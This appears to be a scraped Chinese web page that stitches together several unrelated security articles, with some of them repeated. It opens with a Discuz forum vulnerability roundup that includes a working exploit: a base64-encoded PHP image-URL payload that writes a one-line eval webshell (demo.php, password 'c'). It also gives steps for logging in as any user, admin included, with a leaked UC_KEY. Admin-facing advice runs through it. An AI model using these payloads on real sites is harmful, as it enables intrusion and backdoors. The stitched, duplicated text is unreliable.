DZ网站快照劫持漏洞【最全整理】
DZ网站快照劫持漏洞【最全整理】

0x00 网站快照劫持:DZ常见漏洞利用分析0x01Discuz上传图片附件实现远程命令执行漏洞漏洞产生过程:forum_image.php中的$w,$h变量可控,末处理直接传入Thumb()函数,经该函数传入Thumb_IM()函数,最终调用exec()导致远程命令执行漏洞。
通过分析可知:需要forum.php调用image_class模块调用图像预览功能,后台上传设置为ImagicMagick库,默认为GD库渲染。
前台登录发贴上传图片附件。
提示: forum.php是常被利用的文件(论坛首页入口组件),论坛附件上传是个突破口。
0x02ImageMagick远程执行漏洞分析及利用目前所有版本的Graphicsmagick和ImageMagick都支持打开文件,当文件名的第一个字符为‘|’,则文件名会被传递给shell程序执行,导致(可能远程)代码执行。
提示:ImageMagick图片程序对文件名处理机制存在漏洞0x03Discuz GetShell(获取权限)漏洞EXP1.注册任意账户,登陆用户,发表blog日志(注意是日志)2.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAg QGV 2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}3.访问日志,论坛根目录下生成demo.php,一句话密码c由0x01、0x02与0x03可知论坛上传图片是被利用最常见的漏洞,管理员们要注意把控。
0x04 Discuz获取UC key Getshell(获取权限)。
知道UC的appkey的情况下getshell,问题的根源在于api/uc.php几乎所有版本都可以(在得到uc_key情况下)/api/uc.php里面有个synlogin 方法只要网上随便找个以前uckeygetshell的脚本加密一下这个'time='.time().'&action=synlogin&uid=你要登录的用户的id';得到code后直接访问域名/api/uc.php?code=你加密后的code,就能登录了,admin管理员也是可以登录的。
Web安全漏洞大盘点

Web安全漏洞大盘点Web安全漏洞是互联网时代亟待解决的问题之一。
随着Web应用的普及,安全漏洞也越来越普遍,给网络用户带来了巨大的安全隐患。
本文将对Web安全漏洞进行大盘点,分析其产生原因、类型和防范措施。
一、Web安全漏洞的产生原因Web安全漏洞的产生原因非常多,但可以归纳为两类,一是技术问题,二是人员问题。
技术问题主要体现在Web应用程序的设计和开发过程中。
例如,输入过滤不严,导致XSS漏洞;不恰当的会话管理,导致会话劫持漏洞;逻辑错误,导致逻辑漏洞等等。
这些问题大多是由于程序员的疏忽或不了解安全编码规范而导致。
人员问题主要是由于管理不善、员工素质低下或不当操作等原因导致的。
例如,不恰当的权限设置,导致SQL注入漏洞;管理员密码泄露,导致后门漏洞等等。
这些问题通常是由于管理者忽视安全管理或员工不慎导致的。
二、Web安全漏洞的类型Web安全漏洞的类型繁多,可以分为以下几类:1、SQL注入漏洞:指黑客通过在Web应用程序的输入框中注入SQL代码,从而实现对数据库的非法操作。
2、XSS漏洞:指黑客通过在Web应用程序的输入框中注入恶意脚本,从而实现对用户机器的攻击。
3、CSRF漏洞:指黑客通过伪造用户请求,实现对Web应用程序的非法操作。
4、文件上传漏洞:指黑客通过上传可执行文件,从而实现对Web应用程序的攻击。
5、任意文件读写漏洞:指黑客通过任意文件读写操作,从而实现对Web应用程序的攻击。
6、逻辑漏洞:指黑客通过绕过逻辑流程,从而实现对Web应用程序的攻击。
7、路径遍历漏洞:指黑客通过访问Web应用程序中没有限制的目录,从而实现对 Web应用程序的攻击。
8、信息泄漏漏洞:指Web应用程序设计如未经过安全处理的响应中含有敏感信息(如核心代码、数据库连接等),从而被黑客利用。
三、Web安全漏洞的防范措施针对不同类型的Web安全漏洞,我们可以采取不同的防范措施。
例如:1、SQL注入漏洞:使用参数化查询、限制数据库连接权限、避免直接拼接SQL语句等方式。
网络安全常见漏洞防范技巧

网络安全常见漏洞防范技巧随着互联网的普及和发展,网络安全问题日益凸显。
各种恶意攻击和漏洞的存在使得个人和企业在网络使用过程中面临着很大的风险。
为了保护自身和组织的信息安全,我们需要学习和掌握网络安全常见漏洞的防范技巧。
本文将介绍几个常见的漏洞,并提供相应的防范策略,以帮助读者加强网络安全意识。
一、弱密码问题弱密码是最常见的网络安全漏洞之一。
许多人使用简单易猜的密码,如生日、姓名、电话号码等,这些密码容易被破解,给黑客提供了便利。
为了避免这个问题,我们应该采取以下措施:1. 使用强密码:密码应由大写字母、小写字母、数字和特殊符号组成,长度不少于8位。
密码应该是随机的,并且定期更改。
2. 使用多因素认证:多因素认证是指除了密码之外,还需要其他因素进行身份验证,比如指纹、短信验证码等。
启用多因素认证可以大大提高账户的安全性。
二、软件漏洞问题在大多数情况下,黑客通过利用软件漏洞来攻击系统。
为了防范这类漏洞,我们可以采取以下步骤:1. 及时更新软件:软件厂商会不断修复安全漏洞,并发布更新补丁。
我们应该定期检查并安装这些更新,确保软件一直处于最新版本。
2. 使用安全软件:安装杀毒软件和防火墙等安全软件可以提供实时保护,及早发现和阻止恶意软件。
三、社交工程攻击社交工程攻击是指黑客利用人的心理弱点来获取信息或入侵系统。
为了防范这类攻击,我们需要注意以下几点:1. 谨慎对待陌生人的请求:不要随意点击陌生人的链接或下载陌生人的文件。
这可能是黑客发送的恶意链接,用来窃取个人信息。
2. 提高警惕性:如果接到看似合法的电话或电子邮件,要仔细核实对方身份,以免泄露敏感信息。
四、SQL注入攻击SQL注入攻击是指黑客通过在输入参数中插入恶意SQL语句来获取数据库的敏感数据。
为了防范这类攻击,我们可以采取以下策略:1. 使用参数化查询:数据库处理参数化查询会将用户输入的数据与查询语句分开,避免直接拼接用户输入的数据到查询语句中,减少注入攻击的风险。
网站漏洞检测归类和解决方案

网站漏洞检测归类和解决方案doc文档可能在WAP端扫瞄体验不佳。
建议您优先选择TXT,或下载源文件到本机查看。
一、典型网站漏洞分类依照风险等级,网站漏洞通常可分为高风险、中风险和低风险三种。
其中高风险漏洞是必须封堵的。
中、低风险漏洞中有一部分是必须封堵的。
还有一部分中、低风险漏洞,由于其封堵的代价可能远高于不封堵所造成的缺失,因而能够进行选择性封堵。
能够采取工具亿思平台进行其网站的漏洞扫描,具体地址为: :// iiscan 典型网站漏洞的分类及相应的封堵要求如下表所示:风险等级高风险 1、 SQL 注入漏洞 2、跨站漏洞中、低风险 1、默认测试用例文件 2、治理后台登陆入口中、低风险 1、存在电子邮件地址漏洞名称3、 XPATH 注入漏 3、应用程序错误引起的 2、无效链接洞信息泄露4、备份文件造成的源代码泄漏 3、 Web 应用默认目录封堵要求必须封堵选择封堵1二、典型网站漏洞阻碍及解决方案1、 SQL 注入漏洞漏洞阻碍:本漏洞属于 Web 应用安全中的常见漏洞,属于 OWASP TOP 10 (2007)中的注入类漏洞。
专门多 WEB 应用中都存在 SQL 注入漏洞。
SQL 注入是一种攻击者利用代码缺陷进行攻击的方式,可在任何能够阻碍数据库查询的应用程序参数中利用。
例如 url 本身的参数、post 数据或 cookie 值。
正常的 SQL 注入攻击专门大程度上取决于攻击者使用从错误消息所获得信息。
然而,即使没有显示错误消息应用程序仍可能受SQL 注入的阻碍。
总体上讲,SQL 注入是对 web 应用而不是对 web 服务器或操作系统本身的攻击。
正如其名称所示,SQL 注入是对查询添加非预期 SQL 命令从而以数据库治理员或开发人员非预期的方式操控数据库的行为。
假如成功的话,就能够获得、修改、注入或删除有漏洞 web 应用所使用数据库服务器的数据。
在某些环境下,可利用 SQL 注入完全操纵系统。
网站常见漏洞及解决办法

网站常见漏洞以及解决办法远端HTTP服务器类型和版本信息泄漏1、ServerTokens 指令语法- ServerTokens Major|Minor|Min[imal]|Prod[uctOnly]|OS|Full默认值- ServerTokens Full这个指令控制了服务器回应给客户端的"Server:"应答头是否包含关于服务器操作系统类型和编译进的模块描述信息。
ServerTokens Prod[uctOnly] 服务器会发送(比如):Server: ApacheServerTokens Major 服务器会发送(比如):Server: Apache/2ServerTokens Minor 服务器会发送(比如):Server: Apache/2.0ServerTokens Min[imal] 服务器会发送(比如):Server: Apache/2.0.41ServerTokens OS 服务器会发送(比如):Server: Apache/2.0.41 (Unix) ServerTokens Full (或未指定) 服务器会发送(比如):Server: Apache/2.0.41 (Unix) PHP/4.2.2 MyMod/1.2此设置将作用于整个服务器,而且不能用在虚拟主机的配置段中。
2.0.44版本以后,这个指令还控制着ServerSignature指令的显示内容。
2、ServerSignature 指令说明: 配置服务器生成页面的页脚语法: ServerSignature On|Off|Email默认值: ServerSignature OffServerSignature 指令允许您配置服务器端生成文档的页脚(错误信息、mod_proxy的ftp目录列表、mod_info的输出)。
您启用这个页脚的原因主要在于处于一个代理服务器链中的时候,用户基本无法辨识出究竟是链中的哪个服务器真正产生了返回的错误信息。
网络安全常见漏洞类型列表整理

网络安全常见漏洞类型列表整理1. 弱密码漏洞弱密码是网络安全中最常见的漏洞之一。
这包括密码长度过短、缺乏特殊字符、过度使用常见字词等。
黑客可以通过暴力破解或使用密码破解工具来获取用户密码,从而入侵系统。
2. 跨站脚本攻击(XSS)跨站脚本攻击是通过在网页上注入恶意脚本代码来攻击用户的浏览器。
黑客通过在输入框、评论区等地方注入恶意代码,当用户访问该页面时,恶意代码会被执行,从而获取用户的敏感信息。
3. 跨站请求伪造(CSRF)跨站请求伪造是黑客通过伪造请求来代替用户发送请求,从而执行某些操作,如更改密码、转账等。
黑客可以通过各种方式获取用户的登录凭证,然后在用户不知情的情况下进行操作。
4. 注入攻击注入攻击是通过向应用程序输入恶意代码,使得应用程序在处理用户输入时执行该代码。
最常见的注入攻击类型是SQL注入,黑客可以通过在输入中注入SQL代码来绕过身份验证、访问和修改数据库。
5. 未经身份验证的访问该漏洞允许未经身份验证的用户访问系统中的敏感信息或执行特权操作。
这可能是由于配置错误、访问控制不当或弱密钥管理等原因造成的。
6. 拒绝服务攻击(DoS)拒绝服务攻击旨在通过使网络或服务不可用来干扰系统的正常运行。
攻击者会通过向目标系统发送大量请求或占用系统资源来超过其处理能力,从而导致系统崩溃或变得不可用。
7. 应用程序漏洞应用程序漏洞包括缓冲区溢出、代码注入、逻辑漏洞等。
这些漏洞允许黑客利用应用程序的错误或弱点来执行未经授权的操作,如访问受限资源或绕过安全措施。
8. 未及时更新和修补系统或应用程序未及时更新和修补也会导致安全漏洞。
网络安全威胁和攻击技术不断发展,而厂商和开发者通常会发布更新和修补程序以修复已知漏洞。
如果未及时应用这些更新,系统就容易受到已知漏洞的攻击。
9. 社会工程学攻击社会工程学攻击是指黑客利用人类的心理弱点进行攻击,例如诱骗用户揭示密码、提供伪造的网站链接等。
这种攻击方式往往比技术性攻击更具有隐蔽性和欺骗性。
网络安全常见漏洞类型列表整理

网络安全常见漏洞类型列表整理网络安全一直是我们关注的焦点,随着科技的发展,网络攻击的手段也变得越来越多样化。
为了更好地保护自己和组织的信息安全,我们需要了解常见的网络安全漏洞类型,以便及时采取相应的防范措施。
下面是一份对网络安全常见漏洞类型的整理。
1. 弱口令漏洞弱口令漏洞指的是密码设置过于简单、容易被猜测或者暴力破解的情况。
这种漏洞存在于各种系统、应用和设备中,攻击者可以通过猜测、字典攻击或穷举法来获取用户密码,并进一步攻击系统、窃取敏感信息。
2. SQL注入漏洞SQL注入漏洞是指攻击者通过将恶意的SQL命令插入到应用程序的输入参数中,从而绕过应用程序的输入验证机制,直接对数据库进行操作。
这种漏洞可能导致敏感数据泄露、数据库受损以及网站功能被恶意篡改。
3. XSS漏洞跨站脚本(XSS)漏洞是指攻击者通过在网页中嵌入恶意脚本代码,使用户在浏览器中执行该恶意代码,从而实现攻击目标,比如窃取用户的Cookie,进行钓鱼攻击等。
XSS漏洞常见于网站表单、评论功能等。
4. CSRF漏洞跨站请求伪造(CSRF)漏洞是指攻击者通过引诱用户访问特定页面或点击恶意链接,使用户在已登录的状态下执行某些操作,而这些操作并非用户本意。
攻击者可以利用这种漏洞进行恶意操作,比如更改用户密码、发起钓鱼攻击等。
5. 文件上传漏洞文件上传漏洞指的是应用程序对用户上传的文件缺乏充分的验证和过滤,导致攻击者可以上传包含恶意代码的文件,从而执行任意的系统命令。
这种漏洞可能导致服务器被入侵、网站受损以及用户数据泄露。
6. 逻辑漏洞逻辑漏洞是指应用程序在设计或编码过程中存在的错误逻辑或不完善的业务逻辑,攻击者可以利用这些漏洞绕过应用程序的访问控制或限制,从而实现非法操作。
逻辑漏洞的修复通常需要对应用程序的代码进行逻辑上的优化和改进。
7. 信息泄露漏洞信息泄露漏洞是指应用程序或系统在设计或实现过程中,存在将敏感信息暴露给攻击者的安全漏洞。
网站常见安全漏洞及防范措施

SQL注入漏洞防范
对请求命令进行过滤
可以通过对请求命令进行过滤来防止SQL注入漏洞,例如使用参数化语句或者对命令进行预处理等。
禁止直接执行用户输入的数据
禁止在数据库中直接执行用户输入的数据,例如不使用双引号或单引号将数据包裹起来。
定期更新和升级数据库驱动程序和应用程序
定期更新和升级数据库驱动程序和应用程序,以防止最新的SQL注入攻击。
在业务高峰期时
此时可以利用自动化测试脚本对云端环境进 行自动化检测和响应,确保云端环境的安全 性。
THANKS
感谢观看
减少使用外部命令使用内置命令 Nhomakorabea01
尽可能使用内置的命令或系统命令来完成任务。这些命令通常
比外部程序更可靠且安全性更高。
合并多个命令
02
将多个命令合并成一个命令,这样可以减少安全风险和漏洞利
用的机会。
使用虚拟化技术
03
通过虚拟化技术可以在一个安全的区域内运行程序,从而保证
安全性和可靠性。
04
云端环境下的安全运营模式
PHP网站安全漏洞类型
全局变量漏洞
PHP中的变量在使用的时候不像其他开发语言那样需 要事先声明,PHP中的变量可以不经声明就直接使用 ,使用的时候系统自动创建,而且也不需要对变量类 型进行说明,系统会自动根据上下文环境自动确定变 量类型。这种方式可以大大减少程序员编程中出错的 概率,使用起来非常的方便。但是这种方式也容易引 发安全漏洞,比如全局变量被恶意利用可以导致敏感 信息泄露或者整个系统的崩溃。
更换Session名称:通常情况下Session的默认名 称是PHPSESSID,这个变量一般是在cookie中保 存的,如果更改了它的名称,就可以阻档黑客的 部分攻击。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
0x00 网站快照劫持:DZ常见漏洞利用分析
0x01Discuz上传图片附件实现远程命令执行漏洞
漏洞产生过程:forum_image.php中的$w,$h变量可控,末处理直接传入Thumb()函数,经该函数传入Thumb_IM()函数,最终调用exec()导致远程命令执行漏洞。
通过分析可知:需要forum.php调用image_class模块调用图像预览功能,后台上传设置为ImagicMagick库,默认为GD库渲染。
前台登录发贴上传图片附件。
提示: forum.php是常被利用的文件(论坛首页入口组件),论坛附件上传是个突破口。
0x02ImageMagick远程执行漏洞分析及利用
目前所有版本的Graphicsmagick和ImageMagick都支持打开文件,当文件名的第一个字符为‘|’,则文件名会被传递给shell程序执行,导致(可能远程)代码执行。
提示:ImageMagick图片程序对文件名处理机制存在漏洞
0x03Discuz GetShell(获取权限)漏洞EXP
1.注册任意账户,登陆用户,发表blog日志(注意是日志)
2.添加图片,选择网络图片,地址
{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV 2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
3.访问日志,论坛根目录下生成demo.php,一句话密码c
由0x01、0x02与0x03可知论坛上传图片是被利用最常见的漏洞,管理员们要注意把控。
0x04 Discuz获取UC key Getshell(获取权限)。
知道UC的appkey的情况下getshell,问题的根源在于api/uc.php
几乎所有版本都可以(在得到uc_key情况下)/api/uc.php里面有个synlogin方法
只要网上随便找个以前uckeygetshell的脚本加密一下这个'time='.time().'&action=synlogin&uid=你
要登录的用户的id';得到code后直接访问域名/api/uc.php?code=你加密后的code,就能登录了,admin
管理员也是可以登录的。
Discuz 的UCenter创始人密码可被爆破,访问登录路径/uc_server/admin.php实现爆破修改文件默认路径,robots.txt注意目录防护,修改UC key加强防范。
有乌云白帽发现Discuz!程序存在一个安全bug,在得知UC_KEY的情况下,可以轻松向受害站点写入后门代码,可对服务器进行渗透或者对网站进行篡改,挂马。
获取到的UC_KEY,可重置论坛任意用户的密码,并清除安全提问。
利用UC_KEY可登录任意用户。
UC_KEY的泄漏主要有以下几个途径:
1.整站打包备份被下载
2.文件备份压缩包被扫描下载
3.SVN等源码管理系统泄漏代码
4.服务器入侵被提了UC_KEY用作后门等等
UCenter Server是不能通过uc_key来获取该服务器上的webshell的,不过可以通过uc_key重置用户口令。
获取uc_key可以通过“config\config_ucenter.php”文件获取。
如果系统开启了防水墙会禁止危险脚本访问,对利用代码进行屏蔽和阻止,导致Webshell 获取失败。
对于X2.5系列,则可以轻松获取Webshell,执行命令“php uc_key.php”命令后,会直接修改“config\config_ucenter.php”。
由0x04可知,UC key是十分重要的,最好定期修改,如果网站被黑内容被篡改找不到任何突破口,请先修改UC key!
0x05Discuz redis/memcache+ssrf Getshell漏洞问题
Discuz存在SSRF漏洞,在配置了memcache的情况下,攻击者可以利用ssrf通过memcache中转,向磁盘上写入Webshell恶意代码,从而造成数据库泄漏。
解法一:
更新替换官方补丁文件:/source/function/function_core.php
解法二:
停止使用或卸载memcache
windows下的Memcache卸载方法:
memcached -d stop
memcached -d remove
sc delete "Memcached Server"
linux memcached 卸载方法:
1、首先查找你的memcached所在目录,可用如下命令查找名为memcached的文件夹
find / -name memcached
2、结束memcached进程
killall memcached
3、删除memcached目录及文件
rm -rf /www/wdlinux/memcached
rm -rf /www/wdlinux/init.d/memcached
4、关闭memcached开机启动
chkconfig memcached off
5、把memcached移出开机启动
chkconfig --del memcached
一般的小站用不着redis/memcache缓解网站压力,所以基本是大站才会受影响。
redis/memcache是干嘛的呢?其实可以把它们理解成一个高性能的数据库,当网站的缓存很大的时候,利用redis/memcache来处理缓存可以提高网站的性能dz的后台也可以看到是否在使用redis/memcache。
如何用redis/memcache做Mysql缓存层呢?
memcached和redis的区别。
前者终究是个缓存,不可能永久保存数据(LRU机制),支持分布式,后者除了缓存的同时也支持把数据持久化到磁盘等。
前提:较少变更的数据才适合做缓存(如css与脚本等)
首先你要自己在服务器上安装redis,然后php默认没有redis扩展,还需要安装phpredis扩展,顺便说一下,phpredis的2.1版本兼容性不太好,安装上去后无法访问网站,用2.28版本就可以了
CentOs下安装Redis和php Redis扩展并配置开机启动
linux php redis扩展的安装和redis服务的安装
0x06 SSRF漏洞原理与复现
简单的说,漏洞就是通过ssrf来操作redis,更改了全局变量的值,导致任意代码执行
当dz设置使用缓存后,初始化时会把缓存内容加入全局变量$_G
Source/class/discuz/discuz_application.php
redis 使用的时候一定要设置密码和访问权限
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。
一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。
(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。
比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。
具体危害体现在以下几点上:
1、URL为内网IP或域名,攻击者将可以通过SSRF漏洞扫描目标内网,查找内网内的漏洞,并想办法反弹权限。
2、URL中包含端口,攻击者将可以扫描并发现内网中机器的其他服务(除了泄露安装软件版本信息,还可以查看端口,操作内网redis服务等)。
3、当请求方法允许其他协议的时候,将可能利用gophar、file等协议进行第三方服务利用,
如利用内网的redis获取权限、利用fastcgi进行getshell等。
很多开发者认为,只要检查一下请求url的host不为内网IP,即可防御SSRF。
这个观点其实提出了两个技术要点:
如何检查IP是否为内网IP
如何获取真正请求的host
于是,攻击者通过这两个技术要点,针对性地想出了很多绕过方法。
0x05与0x06 ssrf Getshell是比较牛的黑客技术才能做的到的。
综上可知,网站被黑,无非就是上传文件getshell提权扫描分析站点文件,执行代码篡改。
可针对以上漏洞,采取加强措施防范,重要的事情说一遍:插件不要随便用,后门可执行代码防不胜防!。